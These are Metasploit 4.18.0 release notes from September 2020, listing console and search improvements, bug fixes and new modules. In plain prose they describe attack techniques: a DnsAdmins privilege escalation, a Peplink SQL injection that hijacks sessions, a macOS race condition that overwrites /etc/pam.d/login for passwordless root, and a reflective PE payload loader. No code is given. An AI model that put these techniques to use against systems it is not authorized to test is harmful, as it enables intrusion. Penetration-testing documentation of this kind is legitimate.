Metasploit Recent Releases / Sep 13, 2020

Sep 13, 20204.18.0

Improved

  • Pro: We improved the designation of hosts with "Unknown" operating systems in Passive Network Discovery PDF reports.
  • PR 13919 - Improvement for auxiliary modules which expose actions, allowing invocation of those exposed actions by the user as commands when the user has changed context into the module through the use command within msfconsole.
  • PR 13980 - Added a new Reflective PE file loader as a payload stage, enabling users to specify an arbitrary EXE or DLL and have it injected into the target process and executed as the payload stage without recompiling it for compatibility using something like ReflectiveDLLInjection.
  • PR 14021 - Updated the module search functionality to only return results where all provided text search terms match. Example: search postgresql login will only return modules matching both postgresql and login.
  • PR 14040 - Updated the exploit/multi/misc/java_rmi_server module to provide a check method, which is implemented by auxiliary/scanner/misc/java_rmi_server.
  • PR 14053 - Improved the info command such that, following a module search, it is now possible to use info to view a specific module's information.
  • PR 14062 - Added a SECURITY.md file to the Metasploit Framework so that users who discover security issues know how those issues can/should be reported to the project maintainers. This file will be rendered through the GitHub interface, as it follows the standard naming convention.
  • PR 14065 - Reduced msfconsole boot time a bit by lazily loading the faker module, which is unneeded at bootup and is only used in a few limited scenarios.
  • PR 14068 - Updated the auxiliary/scanner/smb/smb_enum_gpp module to use RubySMB instead of the old Rex client, allowing support for SMB versions 1-3.
  • PR 14072 - Improved the Python method for shell interaction by updating the PTY shim to be Python 3 compatible. Also fixed the technique in environments where the python3 binary is available and in the PATH, but the python binary is not.
  • PR 14075 - Updated exploits/multi/fileformat/zip_slip to support generating ZIP files.
  • PR 14083 - Updated post/windows/gather/enum_patches to additionally report when patches were installed on a Windows target.
  • PR 14089 - Updated auxiliary/scanner/smb/smb_version for backwards compatibility with older Ruby versions.
  • PR 14090 - Added an example of using info to output from the search command.
  • PR 14106 - Updated the search command to always show an additional note on how interact with the search module results.

Fixed

  • Pro: We fixed an issue where invalid project XML exports would occur when certain characters were present within the project name. Project attributes are now properly XML encoded to ensure valid XML generation on project export.
  • Pro: We fixed an issue where Web Application testing would offer detected aliases which were not DNS compliant as virtual host targets. Only DNS compliant detected aliases are now offered as virtual target hosts by Web Application testing.
  • Pro: We fixed an issue when exporting project data as a Zip archive, where the export was failing to complete under some circumstances. We also fixed an issue with project import of Zip data failing to correctly import. Both operations should now function as-expected.
  • PR 14050 - Fixed an issue with db_import when attempting to import project Zip files exported by Metasploit Pro.
  • PR 14061 - Fixed a performance regression in msfvenom, reducing msfvenom loading time by loading only the relevant module sets for the command being performed.
  • PR 14064 - Fixed HTML module documentation generated from module content, where OSVDB links were broken and some CVE links were missing. CVE links should all now be present and OSVDB entries display their number but are now unlinked.
  • PR 14099 - Fixed the user PowerShell profile path in post/windows/gather/enum_powershell_env when targeting newer versions of Windows.

Modules

  • PR 12983 - New module exploits/windows/local/dnsadmin_serverlevelplugindll achieves local privilege escalation on Windows Server 2003 and later targets, gaining SYSTEM level code execution if the current user is a member of the DnsAdmins group and also has permissions to restart the DNS service.
  • PR 13836 - New module auxiliary/scanner/scada/modbus_banner_grabbing scans targets running the ModBus protocol and performs banner grabbing, saving returned information (which can include manufacturer, model number, etc.) as a note.
  • PR 13847 - New gather module auxiliary/gather/peplink_bauth_sqli takes advantage of CVE-2017-8835, using sql injection against Peplink target devices running firmware before 7.0.1 to hijack a logged in user's account and extract configuration details (including the device license key). This module utilizes extended mixin support for SQLite provided thru GSoC student contribution.
  • PR 13992 - New module exploits/osx/local/cfprefsd_race_condition leverages a race condition that allows arbitrary trusted file write (CVE-2020-9839), exploiting this to gain root by overwriting the /etc/pam.d/login file to allow a root login without a password, logging in without a password, and then returning the file to its original state after gaining root permissions.

Offline Update

Metasploit Framework and Pro Installers